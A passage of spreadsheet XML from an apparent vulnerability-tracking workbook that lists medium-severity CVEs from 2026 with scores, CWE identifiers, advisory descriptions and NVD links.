      <c r="M2111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82069</t>
        </is>
      </c>
    </row>
    <row r="2112">
      <c r="A2112" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82881</t>
        </is>
      </c>
      <c r="C2112" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2112" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2112" s="5" t="inlineStr"/>
      <c r="F2112" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2112" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2112" s="5" t="inlineStr"/>
      <c r="I2112" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2112" s="5" t="inlineStr"/>
      <c r="K2112" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2112" s="5" t="inlineStr">
        <is>
          <t>Aix-DB through 1.2.4 renders markdown with raw HTML enabled into v-html bindings without sanitization, allowing stored cross-site scripting attacks. Attackers can inject malicious HTML and JavaScript through markdown content in chat responses, skill descriptions, or knowledge messages that execute in users' browsers when viewed.</t>
        </is>
      </c>
      <c r="M2112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82881</t>
        </is>
      </c>
    </row>
    <row r="2113">
      <c r="A2113" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84305</t>
        </is>
      </c>
      <c r="C2113" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2113" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2113" s="5" t="inlineStr"/>
      <c r="F2113" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2113" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2113" s="5" t="inlineStr"/>
      <c r="I2113" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2113" s="5" t="inlineStr"/>
      <c r="K2113" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L2113" s="5" t="inlineStr">
        <is>
          <t>sqlparse is a non-validating SQL parser module for Python. Prior to 0.6.0, sqlparse.format(sql, reindent=True) and sqlformat --reindent route attacker-controlled parenthesized tuple lists through ReindentFilter._get_offset() in sqlparse/filters/reindent.py, where _flatten_up_to_token() repeatedly rebuilds and joins the statement prefix. Thousands of offset calculations walk an expanding token tree, producing quadratic CPU consumption for inputs that remain below MAX_GROUPING_TOKENS and causing request delays, reduced throughput, or worker starvation. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="M2113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84305</t>
        </is>
      </c>
    </row>
    <row r="2114">
      <c r="A2114" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84386</t>
        </is>
      </c>
      <c r="C2114" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2114" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2114" s="5" t="inlineStr"/>
      <c r="F2114" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2114" s="5" t="inlineStr">
        <is>
          <t>windows, fortinet</t>
        </is>
      </c>
      <c r="H2114" s="5" t="inlineStr"/>
      <c r="I2114" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2114" s="5" t="inlineStr"/>
      <c r="K2114" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="L2114" s="5" t="inlineStr">
        <is>
          <t>A unverified ownership vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.7, FortiClientWindows 7.2 all versions may allow attacker to improper access control via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M2114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84386</t>
        </is>
      </c>
    </row>
    <row r="2115">
      <c r="A2115" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84967</t>
        </is>
      </c>
      <c r="C2115" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2115" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2115" s="5" t="inlineStr"/>
      <c r="F2115" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2115" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H2115" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="I2115" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2115" s="5" t="inlineStr"/>
      <c r="K2115" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2115" s="5" t="inlineStr">
        <is>
          <t>A component of the MongoDB extension for Visual Studio Code does not neutralize special characters in a connection string before that value is placed into a command line the extension composes for an integrated terminal. An unauthenticated remote unauthorized-user who persuades a developer to accept a user-supplied connection target, and then to open the extension's shell feature, can place characters of the unauthorized-user’s choosing into that command line. No privileges on the developer's machine are required, but several user actions are. The confirmation the developer sees does not display the supplied text.</t>
        </is>
      </c>
      <c r="M2115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84967</t>
        </is>
      </c>
    </row>
    <row r="2116">
      <c r="A2116" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85593</t>
        </is>
      </c>
      <c r="C2116" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2116" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2116" s="5" t="inlineStr"/>
      <c r="F2116" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2116" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2116" s="5" t="inlineStr"/>
      <c r="I2116" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2116" s="5" t="inlineStr"/>
      <c r="K2116" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2116" s="5" t="inlineStr">
        <is>
          <t>phpMyFAQ versions before 4.1.8 contain a stored cross-site scripting vulnerability in FaqHelper::convertOldInternalLinks() that calls html_entity_decode() on sanitized FAQ content, reversing entity-encoding protection. Authenticated users with FAQ editing privileges can inject JavaScript payloads that execute in the browsers of all users viewing the affected FAQ pages.</t>
        </is>
      </c>
      <c r="M2116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85593</t>
        </is>
      </c>
    </row>
    <row r="2117">
      <c r="A2117" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85599</t>
        </is>
      </c>
      <c r="C2117" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2117" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2117" s="5" t="inlineStr"/>
      <c r="F2117" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2117" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2117" s="5" t="inlineStr"/>
      <c r="I2117" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2117" s="5" t="inlineStr"/>
      <c r="K2117" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2117" s="5" t="inlineStr">
        <is>
          <t>Grav Shortcode Core before 6.2.5 contains stored cross-site scripting vulnerabilities in the [lorem] tag parameter and [details] summary parameter that are written to rendered pages without escaping. Attackers with page-edit access can inject arbitrary HTML and JavaScript that executes in the browsers of all page visitors, including administrators.</t>
        </is>
      </c>
      <c r="M2117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85599</t>
        </is>
      </c>
    </row>
    <row r="2118">
      <c r="A2118" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85601</t>
        </is>
      </c>
      <c r="C2118" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2118" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2118" s="5" t="inlineStr"/>
      <c r="F2118" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2118" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2118" s="5" t="inlineStr"/>
      <c r="I2118" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2118" s="5" t="inlineStr"/>
      <c r="K2118" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2118" s="5" t="inlineStr">
        <is>
          <t>Grav Admin before 2.0.20 fails to sanitize output from marked.parse() before injecting it into the DOM via Svelte's {@html} directive in MarkdownEditor and MarkdownModal components. Attackers can inject javascript: URI schemes in plugin or theme changelogs to execute arbitrary code in authenticated admin sessions without requiring site access.</t>
        </is>
      </c>
      <c r="M2118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85601</t>
        </is>
      </c>
    </row>
    <row r="2119">
      <c r="A2119" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85781</t>
        </is>
      </c>
      <c r="C2119" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2119" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2119" s="5" t="inlineStr"/>
      <c r="F2119" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2119" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H2119" s="5" t="inlineStr"/>
      <c r="I2119" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2119" s="5" t="inlineStr"/>
      <c r="K2119" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="L2119" s="5" t="inlineStr">
        <is>
          <t>Unverified ownership of a storage access point in the volume deletion component of the Amazon EFS CSI Driver before v3.4.1 might allow an authenticated Kubernetes user with PersistentVolume creation privileges to cause recursive deletion of directories on an EFS filesystem they are not authorized to access, via a crafted PersistentVolume volumeHandle that pairs an access point from one filesystem with a different target filesystem.
To remediate this issue, users should upgrade to version v3.4.1.</t>
        </is>
      </c>
      <c r="M2119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85781</t>
        </is>
      </c>
    </row>
    <row r="2120">
      <c r="A2120" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86440</t>
        </is>
      </c>
      <c r="C2120" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2120" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2120" s="5" t="inlineStr"/>
      <c r="F2120" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2120" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2120" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I2120" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2120" s="5" t="inlineStr"/>
      <c r="K2120" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="L2120" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP insufficiently validate URLs used by dashboard widgets, particularly the Button widget.
The widget's URL is stored configuration controlled by a user. The previous renderer considered a URL safe if it appeared relative or if its parsed hostname matched the configured MISP hostname. That logic failed to reject dangerous schemes and URL forms that browsers normalize differently from PHP's URL parsing.
As a result, values such as javascript: URLs or backslash-based authority forms could reach the generated anchor's href and execute script or navigate to an attacker-controlled origin when another user interacted with the widget. The upstream commit describes the issue as:
“javascript: and backslash URLs reached the href (stored XSS)”.
The fix routes widget URLs through a shared DashboardURLValidator, rejects dangerous schemes, raw backslashes, control characters, and unauthorized absolute origins, and validates the URL both in the widget handler and renderer.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M2120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86440</t>
        </is>
      </c>
    </row>
    <row r="2121">
      <c r="A2121" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86516</t>
        </is>
      </c>
      <c r="C2121" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2121" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2121" s="5" t="inlineStr"/>
      <c r="F2121" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2121" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H2121" s="5" t="inlineStr"/>
      <c r="I2121" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2121" s="5" t="inlineStr"/>
      <c r="K2121" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-269</t>
        </is>
      </c>
      <c r="L2121" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in elenavanengelenmaslova mocknest-serverless 0.9.0. The affected element is an unknown function of the file deployment/aws/shared/github-oidc-role.yaml of the component AWS GitHub OIDC Deployment Helper Script. Performing a manipulation results in improper privilege management. It is possible to initiate the attack remotely. The patch is named 6ab3147282d867c1993f995272750db091c2290b. Applying a patch is the recommended action to fix this issue.</t>
        </is>
      </c>
      <c r="M2121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86516</t>
        </is>
      </c>
    </row>
    <row r="2122">
      <c r="A2122" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86742</t>
        </is>
      </c>
      <c r="C2122" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2122" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2122" s="5" t="inlineStr"/>
      <c r="F2122" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2122" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2122" s="5" t="inlineStr"/>
      <c r="I2122" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2122" s="5" t="inlineStr"/>
      <c r="K2122" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="L2122" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT through 8.6.3 does not neutralize formula elements in the "unaccepted assets" acceptance report CSV export. ReportsController::postAssetAcceptanceReport builds the CSV by hand (stripping commas and joining rows manually) and, unlike the six sibling exports in the same controller, never applies League\Csv\EscapeFormula or honors the config('app.escape_formulas') setting. An authenticated low-privilege user with ordinary create/edit rights on any record whose free-text fields appear in the report (asset name/tag, company name, category, model, or assignee display name) can set such a field to a value beginning with =, +, -, @, tab, or CR. When a user with reports.view privileges requests the export (POST /reports/unaccepted_assets) for a pending checkout acceptance referencing the poisoned record and opens the resulting CSV in Excel, LibreOffice Calc, or Google Sheets, the injected content is evaluated as a formula in the downloader's spreadsheet context, enabling data exfiltration (e.g., HYPERLINK/WEBSERVICE) or, on legacy Windows Excel configurations, DDE command execution. Fixed in 8.7.0.</t>
        </is>
      </c>
      <c r="M2122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86742</t>
        </is>
      </c>
    </row>
    <row r="2123">
      <c r="A2123" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86745</t>
        </is>
      </c>
      <c r="C2123" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2123" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2123" s="5" t="inlineStr"/>
      <c r="F2123" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2123" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2123" s="5" t="inlineStr"/>
      <c r="I2123" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2123" s="5" t="inlineStr"/>
      <c r="K2123" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="L2123" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset management application. In Snipe-IT master-branch builds after 8.6.3 (the code was never included in a tagged release), SettingsController::downloadLocationScopingReport streams the FMCS location-scoping mismatch report (GET /admin/settings/location-scoping-report.csv) through a bare fputcsv() call without applying League\Csv\EscapeFormula, unlike the other CSV exports which honor config('app.escape_formulas'). An authenticated user with ordinary create/edit rights can place a spreadsheet formula in free-text fields that appear in the report (item name, asset tag, serial, item or location company name, location name) and arrange for the record to be FMCS-mismatched so it is included in the export. When a superuser downloads the report and opens it in Excel, LibreOffice Calc, or Google Sheets with formula evaluation enabled and external-content warnings dismissed or disabled, cells beginning with =, +, -, @, tab, or CR are executed in the victim's spreadsheet context, enabling data exfiltration (e.g., HYPERLINK/WEBSERVICE) or, on Windows Excel, legacy DDE command execution. This issue is fixed in version 8.7.0.</t>
        </is>
      </c>
      <c r="M2123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86745</t>
        </is>
      </c>
    </row>
    <row r="2124">
      <c r="A2124" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87912</t>
        </is>
      </c>
      <c r="C2124" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2124" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2124" s="5" t="inlineStr"/>
      <c r="F2124" s="5" t="inlineStr"/>
      <c r="G2124" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H2124" s="5" t="inlineStr"/>
      <c r="I2124" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2124" s="5" t="inlineStr"/>
      <c r="K2124" s="5" t="inlineStr">
        <is>
          <t>CWE-283, CWE-341</t>
        </is>
      </c>
      <c r="L2124" s="5" t="inlineStr">
        <is>
          <t>A missing S3 bucket ownership verification in the AWS Security Agent plugin in Amazon aws-agents-for-devsecops before 1.1.0 might allow remote attackers to obtain the private source archive of a scanned workspace, including credentials and infrastructure state contained in that archive, via a pre-registered storage bucket whose name is derived from a publicly known account identifier.
To remediate this issue, users should upgrade to version 1.1.0. Users should also verify that the scan output bucket in their account is owned by their own account, because upgrading does not release a bucket name that a third party has already registered.</t>
        </is>
      </c>
      <c r="M2124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87912</t>
        </is>
      </c>
    </row>
    <row r="2125">
      <c r="A2125" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87913</t>
        </is>
      </c>
      <c r="C2125" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2125" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2125" s="5" t="inlineStr"/>
      <c r="F2125" s="5" t="inlineStr"/>
      <c r="G2125" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H2125" s="5" t="inlineStr"/>
      <c r="I2125" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2125" s="5" t="inlineStr"/>
      <c r="K2125" s="5" t="inlineStr">
        <is>
          <t>CWE-283, CWE-341</t>
        </is>
      </c>
      <c r="L2125" s="5" t="inlineStr">
        <is>
          <t>A missing S3 bucket ownership verification in the AWS Security Agent MCP server before 0.2.0 version might allow remote attackers to obtain the private source archive of a scanned workspace, including credentials and infrastructure state contained in that archive, via a pre-registered storage bucket whose name is derived from a publicly known account identifier.
To remediate this issue, users should upgrade to version 0.2.0. Users should also verify that the scan output bucket in their account is owned by their own account, because upgrading does not release a bucket name that a third party has already registered.</t>
        </is>
      </c>
      <c r="M2125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87913</t>
        </is>
      </c>
    </row>
    <row r="2126">
      <c r="A2126" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4361</t>
        </is>
      </c>
      <c r="C2126" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D2126" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2126" s="5" t="inlineStr"/>
      <c r="F2126" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2126" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H2126" s="5" t="inlineStr"/>
      <c r="I2126" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J2126" s="5" t="inlineStr"/>
      <c r="K2126" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2126" s="5" t="inlineStr">
        <is>
          <t>The Divi theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.27.6. This is due to the `et_pb_set_video_oembed_thumbnail_resolution()` function using `wp_remote_get()` instead of `wp_safe_remote_get()` to fetch a remote image URL, which does not restrict requests to private or reserved IP ranges. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application server. The response body is not returned to the attacker (blind SSRF), but two oracles exist: a status oracle (the returned URL string differs depending on whether the target responded with HTTP 200) and a timing oracle (response time varies by target reachability).</t>
        </is>
      </c>
      <c r="M2126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4361</t>
        </is>
      </c>
    </row>
    <row r="2127">
      <c r="A2127" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55425</t>
        </is>
      </c>
      <c r="C2127" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D2127" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2127" s="5" t="inlineStr"/>
      <c r="F2127" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2127" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2127" s="5" t="inlineStr"/>
      <c r="I2127" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2127" s="5" t="inlineStr"/>
      <c r="K2127" s="5" t="inlineStr">
        <is>
          <t>CWE-213</t>
        </is>
      </c>
      <c r="L2127" s="5" t="inlineStr">
        <is>
          <t>Graylog is a free and open log management platform. From 7.1.0 until 7.1.4 and 7.2.0-alpha.2, the System Catalog entity titles endpoint in graylog2-server/src/main/java/org/graylog2/rest/resources/system/contentpacks/titles/EntityTitleServiceImpl.java allows an authenticated user to request composite display fields without verifying that every selected field is readable. A user can retrieve protected values, including the password hash on a readable user record; ordinary users are limited to their own permitted records, while administrators can retrieve hashes for all users. This issue is fixed in versions 7.1.4 and 7.2.0-alpha.2.</t>
        </is>
      </c>
      <c r="M2127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55425</t>
        </is>
      </c>
    </row>
    <row r="2128">
      <c r="A2128" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62293</t>
        </is>
      </c>
      <c r="C2128" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D2128" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2128" s="5" t="inlineStr"/>
      <c r="F2128" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2128" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2128" s="5" t="inlineStr"/>
      <c r="I2128" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2128" s="5" t="inlineStr"/>
      <c r="K2128" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="L2128" s="5" t="inlineStr">
        <is>
          <t>HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to 6.9.11, the hidden scan command concatenates attacker-controlled Implementation Guide titles, profile titles, and source references into scan.html without escaping in Scanner.java. As a result, a user who scans an attacker-supplied IG/profile and then opens or publishes the generated local/CI HTML report can trigger stored cross-site scripting, executing attacker-controlled JavaScript in the report's browser context. This issue is fixed in version 6.9.11.</t>
        </is>
      </c>
      <c r="M2128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62293</t>
        </is>
      </c>
    </row>
    <row r="2129">
      <c r="A2129" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70588</t>
        </is>
      </c>
      <c r="C2129" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D2129" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2129" s="5" t="inlineStr"/>
      <c r="F2129" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2129" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2129" s="5" t="inlineStr"/>
      <c r="I2129" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2129" s="5" t="inlineStr"/>
      <c r="K2129" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2129" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 5.26.0 until 6.54.1, the Universal Import feature in Ghost Admin failed to properly sanitize imported content resulting in XSS in post content. This issue is fixed in version 6.54.1.</t>
        </is>
      </c>
      <c r="M2129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70588</t>
        </is>
      </c>
    </row>
    <row r="2130">
      <c r="A2130" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72976</t>
        </is>
      </c>
      <c r="C2130" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D2130" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2130" s="5" t="inlineStr"/>
      <c r="F2130" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2130" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2130" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I2130" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2130" s="5" t="inlineStr"/>
      <c r="K2130" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2130" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M2130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72976</t>
        </is>
      </c>
    </row>
    <row r="2131">
      <c r="A2131" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2131" s="5" t="inlineStr">
        <is>
